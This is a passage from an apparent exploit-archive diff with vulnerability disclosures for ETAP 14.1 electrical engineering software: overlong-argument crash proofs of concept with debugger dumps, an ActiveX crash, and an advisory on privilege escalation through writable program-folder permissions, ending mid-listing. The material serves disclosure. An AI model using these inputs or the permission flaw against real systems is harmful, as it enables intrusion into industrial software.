00410041 00410041 00410041 ra!CFileMap::SetFileLength+0x125a2 +0018ff4c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff50 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff54 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff58 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff5c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff60 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff64 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff68 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff6c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff70 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff74 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff78 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff7c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff80 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +0018ff84 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21 +.. +0:000> d esi +005c2962 72 00 61 00 2e 00 65 00-78 00 65 00 20 00 20 00 r.a...e.x.e. . . +005c2972 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c2982 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c2992 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c29a2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c29b2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c29c2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +005c29d2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. + + +=============================== + + +C:\ETAP 1410>SFA.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +STATUS_STACK_BUFFER_OVERRUN encountered +(39e0.35b4): WOW64 breakpoint - code 4000001f (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for SFA.exe - +kernel32!GetProfileStringW+0x12cc9: +75150265 cc int 3 + + +=============================== + + +C:\ETAP 1410>so3ph.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +STATUS_STACK_BUFFER_OVERRUN encountered +(380c.3cc4): Break instruction exception - code 80000003 (first chance) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll - +*** WARNING: Unable to verify checksum for SO3Ph.exe +*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe - +kernel32!UnhandledExceptionFilter+0x71: +00000000`76fcb8c1 cc int 3 +0:000> r +rax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000 +rdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002 +rip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff + r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 +r11=00000000000fe310 r12=0000000140086150 r13=0000000000000000 +r14=000000000012eb00 r15=0000000000000000 +iopl=0 nv up ei pl nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 +kernel32!UnhandledExceptionFilter+0x71: +00000000`76fcb8c1 cc int 3 + + +=============================== + + +C:\ETAP 1410>TDULF.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + +(36bc.36b8): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll - +*** WARNING: Unable to verify checksum for C:\ETAP 1410\LF3PHDLL.dll +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\LF3PHDLL.dll - +kernel32!lstrcpyW+0xa: +00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341 +0:000> r +rax=000000000012e9d0 rbx=0000000000000001 rcx=0000000000130000 +rdx=0000000000000041 rsi=0000000000000000 rdi=000000000012bcf0 +rip=0000000076f7e41a rsp=000000000012bc98 rbp=0000000000000000 + r8=000000000012fc18 r9=0000000000000000 r10=0000000000000000 +r11=0000000000000202 r12=0000000000000000 r13=0000000000000000 +r14=000000000000000a r15=0000000000000000 +iopl=0 nv up ei pl nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +kernel32!lstrcpyW+0xa: +00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341 +0:000> d rax +00000000`0012e9d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012e9e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012e9f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +00000000`0012ea40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +... +0:000> r +rax=0000000000000000 rbx=0000000000000001 rcx=ffffffffffffffff +rdx=00410041004123a1 rsi=0000000000000000 rdi=00410041004123a1 +rip=000007fefd0a17c7 rsp=000000000012b9a8 rbp=0000000000000000 + r8=ffffffffffffffff r9=000000000012ef68 r10=0000000000000000 +r11=0000000000000202 r12=0000000000000000 r13=0000000000000000 +r14=000000000000000a r15=0000000000000000 +iopl=0 nv up ei ng nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286 +KERNELBASE!lstrlenW+0x17: +000007fe`fd0a17c7 66f2af repne scas word ptr [rdi] + + +=============================== + + +COM/ActiveX PoCs: +----------------- + + + + + + + +(2750.243c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\OLEAUT32.dll - +eax=00000000 ebx=00000000 ecx=00000000 edx=02d13084 esi=02d13084 edi=001be684 +eip=0301c146 esp=001be608 ebp=001be634 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +iPlotLibrary!DllUnregisterServer+0x104e5a: +0301c146 8b4304 mov eax,dword ptr [ebx+4] ds:002b:00000004=???????? +0:000> d edx +02d13084 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d13094 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +02d130f4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + + +=============================== + + + + + + diff --git a/platforms/windows/local/39845.txt b/platforms/windows/local/39845.txt new file mode 100755 index 000000000..2cff8a2ab --- /dev/null +++ b/platforms/windows/local/39845.txt @@ -0,0 +1,481 @@ + +Operation Technology ETAP 14.1.0 Local Privilege Escalation + + +Vendor: Operation Technology, Inc. +Product web page: http://www.etap.com +Affected version: 14.1.0.0 + +Summary: Enterprise Software Solution for Electrical Power Systems. ETAP +is the most comprehensive electrical engineering software platform for the +design, simulation, operation, and automation of generation, transmission, +distribution, and industrial systems. As a fully integrated model-driven +enterprise solution, ETAP extends from modeling to operation to offer a +Real-Time Power Management System. + +Desc: ETAP suffers from an elevation of privileges vulnerability which can +be used by a simple authenticated user that can change the executable file +with a binary of choice. The vulnerability exist due to the improper permissions, +with the 'C' flag (Change) for 'Authenticated Users' group. + +Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64 + Microsoft Windows 7 Ultimate SP1 (EN) x86_64 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5323 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5323.php + + +07.04.2016 + +-- + + +C:\>icacls "ETAP 1410" +ETAP 1410 BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) + NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) + + +C:\ETAP 1410>icacls etaps64.exe +etaps64.exe BUILTIN\Administrators:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Users:(I)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) + +Successfully processed 1 files; Failed processing 0 files + + +Affected binaries: +------------------ + +C:\ETAP 1410>dir + Volume in drive C is Windows + Volume Serial Number is 56F3-8688 + + Directory of C:\ETAP 1410 + +07/04/2016 11:42 . +07/04/2016 11:42 .. +01/02/2016 11:14 766 16COLOR.CUR +19/01/2016 02:36 238,592 acsdvd.exe +19/01/2016 02:34 81,920 bifact.dll +19/01/2016 02:36 7,980,032 ca.exe +26/02/2016 16:56 1,220,608 cddll64.dll +19/01/2016 01:48 14,848 ComtradeReader.dll +17/11/2015 17:54 66,982 configdescriptions.xml +01/02/2016 11:14 1,620 ContourSetting.ini +07/04/2016 11:41 Convert +19/01/2016 02:35 212,992 csdvd.exe +01/02/2016 11:14 27,136 ctl3d32.dll +19/01/2016 02:28 112,128 ctrlpb.exe +27/06/2013 15:17 7,582 Currency.xml +05/03/2009 12:44 65,536 dao.dll +07/04/2016 11:41 Datablocks +26/02/2016 16:35 13,256,192 DATADB.dll +26/02/2016 16:51 19,252,736 datadb64.dll +10/08/2015 13:00 2,011,136 DBCompareInstr.mdb +10/08/2015 13:01 151,552 dbcompareinstr.sdf +08/10/2010 13:20 503,808 DBCompareOutput.mdb +05/11/2014 14:45 86,016 DBCompareOutput.sdf +08/10/2010 13:20 503,808 DBCompareSummary.mdb +05/11/2014 14:45 28,672 DBCompareSummary.sdf +19/01/2016 02:31 53,248 DBExtractConsoleApp.exe +19/01/2016 02:35 896,000 dccalc.exe +26/02/2016 16:54 352,256 dcspdt64.dll +26/02/2016 16:55 348,160 dcspst64.dll +01/02/2016 11:14 229,376 defaultA.mdb +01/02/2016 11:14 20,971,520 defaulte.mdb +01/02/2016 11:14 17,657,856 defaultm.mdb +01/02/2016 11:14 143,360 dunzip32.dll +01/02/2016 11:14 176,128 dzip32.dll +01/02/2016 11:14 3,262 e-dpp2.ico +01/02/2016 11:14 260,942 Electronic License Grant Terms.pdf +01/02/2016 11:14 315,392 enable40.dll +09/02/2016 17:38 137,728 enginemsgs.dll +19/01/2016 02:34 147,456 enginemsgs64.dll +19/01/2016 02:31 253,952 et2waydataxexcel.exe +19/01/2016 02:31 135,168 etaccess.exe +26/02/2016 16:52 3,872,768 ETAnalyzers64.dll +01/02/2016 11:14 76,999 etap.ico +25/03/2001 10:56 246,434 etap2csv.exe +19/01/2016 02:31 54,784 etapcim.dll +19/01/2016 02:31 1,174,528 EtapDevices.DLL +19/01/2016 02:31 67,072 EtapGISDevices.dll +19/01/2016 02:31 14,336 ETAPMongoDB.dll +26/02/2016 16:24 1,325,568 Etapmsgs.dll +26/02/2016 16:38 1,335,296 etapmsgs64.dll +05/02/2016 17:04 49,012,284 etaps.chm +07/04/2016 11:45 660 ETAPS.INI +09/12/2003 12:13 88 etaps.pek +26/02/2016 17:23 86,749,184 etaps64.exe +22/06/2011 17:40 6,130 ETAPS64.exe.config +26/02/2016 16:29 23,688,704 etapsdb.dll +26/02/2016 16:45 26,805,248 etapsdb64.dll +19/01/2016 02:31 125,440 EtapSmartPlant.exe +26/06/2015 12:51 24,571,904 etapsqlenglishmodel.bak +26/06/2015 12:52 24,436,736 etapsqlmetricmodel.bak +19/01/2016 02:31 52,736 ETAP_CIM.EXE +01/02/2016 11:14 6,184 etap_dy_.ttf +19/01/2016 02:31 94,208 etap_edpp.exe +19/01/2016 02:31 20,480 ETAP_GlobalUtilities.dll +19/01/2016 02:31 32,768 ETAP_Graphics.dll +24/06/2015 08:40 9,977,953 etap_overview.pdf +26/02/2016 16:27 44,032 EtArcFlash.dll +26/02/2016 16:44 51,712 EtArcFlash64.dll +19/01/2016 02:31 192,512 etarcgis.exe +19/01/2016 02:31 192,512 etarcgis92.exe +19/01/2016 02:31 192,512 etarcgis93.exe +19/01/2016 02:31 427,520 ETArcGIS_TD.exe +19/01/2016 02:31 428,544 ETArcGIS_TD10.exe +26/02/2016 16:54 417,792 etbatt64.dll +26/02/2016 16:52 614,912 ETBranch64.dll +26/02/2016 16:26 1,353,728 etcabp.exe +26/02/2016 16:53 4,139,008 etcb64.dll +26/02/2016 16:54 1,220,096 etcharg64.dll +19/01/2016 02:28 307,712 ETConfig.EXE +14/09/2015 08:44 287 ETConfig.exe.config +19/01/2016 02:34 68,096 etcp.exe +19/01/2016 02:31 225,280 etdatamapper.dll +19/01/2016 02:31 172,032 etdataxexcel.exe +26/02/2016 16:54 3,728,384 etdc64.dll +26/02/2016 16:54 433,152 etdcbus64.dll +26/02/2016 16:54 768,512 etdccb64.dll +26/02/2016 16:54 970,752 etdced64.dll +26/02/2016 16:54 406,528 etdcfuse64.dll +26/02/2016 16:54 334,336 etdcimp64.dll +26/02/2016 16:54 367,104 etdcknvt64.dll +26/02/2016 16:54 448,512 etdclmp64.dll +26/02/2016 16:55 1,019,904 etdcmach64.dll +26/02/2016 16:54 422,912 etdcstl64.dll +19/01/2016 02:31 1,228,800 etdevices.dll +19/01/2016 02:40 150,528 ETDistanceRelay64.dll +19/01/2016 02:31 135,168 ETDXF.exe +26/02/2016 16:38 633,344 ETEAView.exe +01/02/2016 11:14 3,771 ETEAView.exe.config +19/01/2016 02:31 651,776 ETEZPowerImport.dll +19/01/2016 02:31 8,192 ETFilter.exe +19/01/2016 02:31 102,400 etglu.dll +19/01/2016 02:31 89,088 etglu64.dll +19/01/2016 02:34 168,448 etgrd.exe +26/02/2016 16:56 704,000 ethf64.dll +26/02/2016 16:26 285,184 ETInterchange.exe +01/02/2016 11:14 3,688 ETInterchange.exe.config +26/02/2016 16:55 1,471,488 etinvert64.dll +26/02/2016 16:52 231,936 etlayout64.dll +26/02/2016 16:44 187,392 etlncalc64.dll +26/02/2016 16:56 9,623,552 etload64.dll +19/01/2016 02:31 414,720 ETMergeSync.exe +19/01/2016 02:28 1,081,344 EtMongoUnmanaged.DLL +26/02/2016 16:52 292,352 etmtrupd64.dll +19/01/2016 02:31 51,712 ETMultispeak.exe +19/01/2016 02:31 73,728 ETPanelRep.exe +14/09/2015 08:44 3,262 etpanelrep.ico +26/02/2016 16:52 918,016 etpe64.dll +26/02/2016 16:45 107,008 ETPlugIn64.dll +26/02/2016 16:25 42,496 ETPMStatus.EXE +01/02/2016 11:14 626 ETPMStatus.exe.config +26/02/2016 16:52 776,192 etprofile64.dll +19/01/2016 02:28 94,208 etpsmsexcel.exe +01/02/2016 11:14 2,032 EtPSMSExcel.exe.config +19/01/2016 02:31 126,976 etrawdata.exe +26/02/2016 16:52 389,632 etreac64.dll +26/02/2016 16:27 4,935,680 etrep.dll +26/02/2016 16:43 6,328,320 etrep64.dll +19/01/2016 02:31 32,768 ETRepAnalyzer.exe +19/01/2016 02:32 496,128 ETSkmParser.dll +26/02/2016 16:36 5,586,432 EtStudyCase.dll +26/02/2016 16:53 7,607,296 EtStudyCase64.dll +26/02/2016 16:53 2,739,200 ETTrack64.dll +26/02/2016 16:26 1,235,968 ettrend.exe +01/02/2016 11:14 4,348 EtTrend.exe.config +26/02/2016 16:25 20,480 ettrenddata.dll +26/02/2016 16:55 1,253,888 etups64.dll +26/02/2016 16:55 1,185,792 etvfd64.dll +19/01/2016 02:31 90,112 ET_CATIA.exe +19/01/2016 02:31 45,056 et_ieee.exe +07/04/2016 11:44 Example-ANSI +07/04/2016 11:41 Example-IEC +07/04/2016 11:41 Example-New +07/04/2016 11:41 ExcelTemplates +01/02/2016 11:14 433,230 filter.xml +01/02/2016 11:14 566 filterall.xml +03/04/2015 12:50 197,074 FilterDXF.xml +08/10/2010 13:20 99,171 FilterOpenExcel.xml +07/04/2016 11:41 Filters +01/02/2016 11:14 33,363 FilterSync.xml +19/01/2016 02:34 102,912 fludbl.dll +07/04/2016 11:42 Formats1400 +07/04/2016 11:42 Formats1410 +19/01/2016 02:34 9,728 gasolve.dll +04/05/2004 10:53 1,645,320 gdiplus.dll +26/02/2016 16:25 115,712 grddata.dll +26/02/2016 16:25 245,248 grdrep.dll +19/01/2016 02:34 9,050,112 harmonic.exe +04/11/2004 08:54 471,040 HHActiveX.dll +26/02/2016 16:25 443,904 ILSEngine.dll +26/02/2016 16:38 560,128 ilsengine64.dll +26/02/2016 16:25 81,920 ilsutils.dll +26/02/2016 16:38 77,824 ILSUtils64.dll +01/02/2016 11:14 12,170 ILS_Report_Logo.jpg +01/02/2016 11:14 26,383 ils_snapshot_stylesheet.xsl +01/02/2016 11:14 45,056 ImageComboBox.dll +01/02/2016 11:14 148,488 Infragistics.Shared.v2.dll +01/02/2016 11:14 147,456 Infragistics.Shared.v3.dll +01/02/2016 11:14 1,074,208 Infragistics.Win.UltraWinGrid.v2.dll +01/02/2016 11:14 1,241,088 Infragistics.Win.UltraWinGrid.v3.dll +01/02/2016 11:14 914,456 Infragistics.Win.v2.dll +01/02/2016 11:14 1,236,992 Infragistics.Win.v3.dll +05/03/2009 12:44 65,536 Interop.DAO.dll +01/02/2016 11:14 1,089,536 Interop.Excel.dll +01/02/2016 11:14 217,088 interop.Microsoft.Office.Core.dll +03/08/2004 23:56 69,632 interop.msxml.dll +05/03/2009 12:44 11,776 interop.stdtype.dll +24/01/2011 04:54 57,344 Interop.VBIDE.dll +19/01/2016 02:36 1,227,264 LA3PH.exe +19/01/2016 02:37 4,359,680 LF3PH.exe +19/01/2016 02:36 4,397,568 LF3PHDLL.dll +19/01/2016 02:35 6,849,536 lffd.exe +19/01/2016 02:36 6,247,936 lfgs.exe +19/01/2016 02:35 6,390,272 lfle.exe +19/01/2016 02:37 7,419,904 lfnr.exe +07/04/2016 11:41 lib +26/02/2016 16:36 1,601,536 libacc.dll +26/02/2016 16:52 2,033,152 libacc64.dll +26/02/2016 16:34 29,691,392 libsdll.dll +26/02/2016 16:50 35,940,864 libsdll64.dll +19/01/2016 01:49 102,400 lineq.dll +09/02/2016 17:53 122,368 LinEq64.dll +26/02/2016 16:24 1,609,216 locetaps.dll +26/02/2016 16:38 1,701,888 locetaps64.dll +26/02/2016 16:24 133,632 locetcom.dll +26/02/2016 16:38 143,872 locetcom64.dll +01/02/2016 11:14 327,556 Logo.png +26/02/2016 16:25 105,984 MDBCompare.exe +01/02/2016 11:14 149 MDBCompare.exe.config +26/02/2016 16:24 20,480 MDBCompareHelper.dll +07/12/1999 04:00 995,383 mfc42.dll +26/02/2016 11:48 7,208,960 mfclog.dll +26/02/2016 12:01 2,949,120 mfclogb.dll +26/02/2016 11:57 4,390,912 mfcloge.dll +16/02/2016 15:41 8,716,288 mfclogl.dll +26/02/2016 11:48 29,425,664 mfcmdb.dll +26/02/2016 12:01 26,279,936 mfcmdbb.dll +26/02/2016 11:57 28,377,088 mfcmdbe.dll +16/02/2016 15:41 29,425,664 mfcmdbl.dll +05/10/2013 01:38 23,720 MFCMIFC80.DLL +26/02/2016 11:48 10,240 mfcoti.dll +26/02/2016 12:01 10,240 mfcotib.dll +26/02/2016 11:57 10,240 mfcotie.dll +16/02/2016 15:41 10,240 mfcotil.dll +26/09/2013 17:12 331,776 MFCPB.DLL +26/02/2016 11:42 29,853,696 mfcpso.dll +26/08/2015 15:54 1,536 mfcpsob.dll +01/10/2015 08:36 22,067,712 mfcpsoe.dll +26/08/2015 16:40 22,182,912 mfcpsol.dll +01/02/2016 11:14 1,100,392 Microsoft.Office.Interop.Excel.dll +01/02/2016 11:14 781,104 Microsoft.Office.Interop.Word.dll +01/02/2016 11:14 161,192 Microsoft.Practices.EnterpriseLibrary.Common.dl +01/02/2016 11:14 91,560 Microsoft.Practices.EnterpriseLibrary.Data.dll +01/02/2016 11:14 42,408 Microsoft.Practices.EnterpriseLibrary.Logging.D +01/02/2016 11:14 218,536 Microsoft.Practices.EnterpriseLibrary.Logging.d +01/02/2016 11:14 64,352 Microsoft.Practices.ObjectBuilder.dll +01/02/2016 11:14 64,088 Microsoft.Vbe.Interop.dll +01/02/2016 11:14 379,392 MongoDB.Bson.dll +01/02/2016 11:14 559,104 MongoDB.Driver.dll +19/01/2016 02:37 7,927,808 ms.exe +18/08/2001 04:00 1,388,544 msvbvm60.dll +29/08/2000 00:00 401,462 Msvcp60.dll +04/05/2001 11:05 290,869 MSVCRT.DLL +07/12/1999 04:00 253,952 msvcrt20.dll +07/12/1999 04:00 65,024 msvcrt40.dll +19/01/2016 02:36 6,827,008 OCP.exe +01/02/2016 11:14 223,800 Office.dll +01/02/2016 11:14 2,429 olhtypicalcurves.xml +01/02/2016 11:14 6,335 OnlineToolbar.xaml +01/02/2016 11:14 96,256 Opc.Ua.Client.dll +19/01/2016 02:28 167,936 Opc.Ua.ClientControls.dll +01/02/2016 11:14 102,400 Opc.Ua.Configuration.dll +01/02/2016 11:14 91,564 Opc.Ua.Configuration.xml +01/02/2016 11:14 2,970,624 Opc.Ua.Core.dll +01/02/2016 11:14 5,606,536 Opc.Ua.Core.xml +19/01/2016 02:29 112,128 OPCEPICS.exe +19/01/2016 02:36 6,549,504 opf.exe +07/04/2016 11:41 Other +19/01/2016 02:28 336,896 Oti.UAToolkit.dll +26/02/2016 16:38 108,544 otiAGCView.dll +26/02/2016 16:25 132,096 otibin.dll +26/02/2016 16:24 106,496 oticommon.dll +26/02/2016 16:38 102,400 oticommon64.dll +26/02/2016 16:38 77,824 oticonfig.dll +26/02/2016 16:38 9,728 oticonfig.xmlserializers.dll +26/02/2016 16:38 167,936 OTIContingency.dll +24/11/2015 18:54 121,344 OtiContourConfig.exe +26/02/2016 16:28 263,680 OtiDistanceRelay.dll +26/02/2016 16:44 263,168 OtiDistanceRelay64.dll +26/02/2016 16:55 1,660,928 OtiDistribDataManager64.dll +26/02/2016 16:44 84,992 OTIDistribution.dll +26/02/2016 16:26 124,928 OTIEA.DLL +26/02/2016 16:38 8,704 OtiEmfToXaml.exe +26/02/2016 16:38 17,920 OtiExcelReport.dll +26/02/2016 17:22 4,165,632 otigraph.dll +26/02/2016 16:38 161,280 otigraph.xmlserializers.dll +26/02/2016 16:28 634,368 OtiGridView.dll +26/02/2016 16:43 638,976 OtiGridView64.dll +26/02/2016 16:25 613,888 OtiInterchange.dll +26/02/2016 16:25 36,864 OtiInterchange.XMLSerializers.DLL +26/02/2016 16:38 613,376 OtiInterchange64.dll +19/01/2016 02:31 183,296 OTIKmlToGis.exe +26/02/2016 16:38 239,104 otilayermanager.dll +26/02/2016 16:38 205,824 OtiLibrary.dll +26/02/2016 16:26 949,760 OtiManage.dll +26/02/2016 16:39 1,397,248 otimanage64.dll +26/02/2016 16:38 72,704 OtiManagedDlg64.dll +26/02/2016 16:25 25,600 otimdbtosql.exe +26/02/2016 16:25 398,336 otimf32.exe +26/02/2016 16:25 12,288 OtiMongoConvert.exe +26/02/2016 16:38 133,632 OtiMongoManaged.dll +26/02/2016 16:25 29,696 OTIOpCon.DLL +26/02/2016 16:38 29,184 OtiOpCon64.dll +19/01/2016 02:28 12,800 OtiPMConfiguration.dll +26/02/2016 16:38 59,904 OtiRemotecode64.dll +26/02/2016 16:38 60,928 OtiRemotecodeinterfaces64.dll +26/02/2016 16:52 538,112 OtiRTDisplay64.dll +26/02/2016 16:38 9,216 OtiRTDisplayInterface.dll +26/02/2016 16:38 86,528 OtiRtWpfControls.dll +26/02/2016 16:38 24,576 OtiRtWpfControlsTelerik.dll +26/02/2016 16:38 574,976 OTIRuleManager.dll +26/02/2016 16:38 24,576 OTIRuleManager.XmlSerializers.dll +26/02/2016 17:22 487,424 otiscenario.dll +26/02/2016 16:38 16,384 OTIScenario.XmlSerializers.dll +26/02/2016 16:25 209,920 OtiServerTracker.dll +26/02/2016 16:38 238,592 OtiServerTracker64.dll +26/02/2016 16:38 5,632 OtiSQLCERead.dll +26/02/2016 16:28 96,768 OtiSQLCeViewer.EXE +19/01/2016 02:28 12,800 OtiSqlUtils.dll +26/02/2016 16:25 229,888 OtiSymbolCreator.exe +26/02/2016 16:24 8,704 OtiSymbolData.dll +26/02/2016 16:25 428,032 OtiSymbolSerializer.dll +26/02/2016 16:38 1,163,264 otitheme.dll +26/02/2016 16:38 210,432 otitheme.xmlserializers.dll +26/02/2016 16:38 287,744 OtiTrack.dll +19/01/2016 02:02 1,043,505 OtiTranslate.xml +26/02/2016 16:36 125,952 pdconfig.exe +19/01/2016 02:31 589,824 PDEUtilities.dll +01/02/2016 11:14 3,760,128 Pegrp32E.dll +01/02/2016 11:14 24,576 PerfSol.Diagnostics.dll +26/02/2016 16:45 98,816 PlotCompare64.exe +26/02/2016 16:45 159,744 PlotFileReader.dll +26/02/2016 16:45 477,184 PlotManager.exe +01/02/2016 11:14 144 PlotManager.exe.config +01/02/2016 11:14 8,945 postaction.cgt +01/02/2016 11:14 6,767 precondition.cgt +19/01/2016 02:28 306,688 psedit.exe +26/02/2016 16:24 253,440 psevent.dll +26/02/2016 16:26 1,324,544 psgrid.exe +08/10/2010 13:20 16,384 psreport.dot +26/02/2016 16:25 189,440 psrept.exe +01/02/2016 11:14 223 psrept.exe.config +26/02/2016 16:25 60,928 pszip.exe +07/04/2016 11:41 pvdt40 +26/02/2016 16:25 125,952 QCPlot.dll +26/02/2016 16:39 148,480 qcplot64.dll +19/01/2016 02:36 201,216 ra.exe +07/12/2015 22:07 3,593,218 Readme.pdf +15/11/2002 10:51 13,755 Readme.wizard.xml +18/12/2007 13:10 99 RegETAP.BAT +08/10/2010 13:20 14,848 reporta4.dot +03/08/2000 04:50 1,056,768 ROBOEX32.DLL +07/04/2016 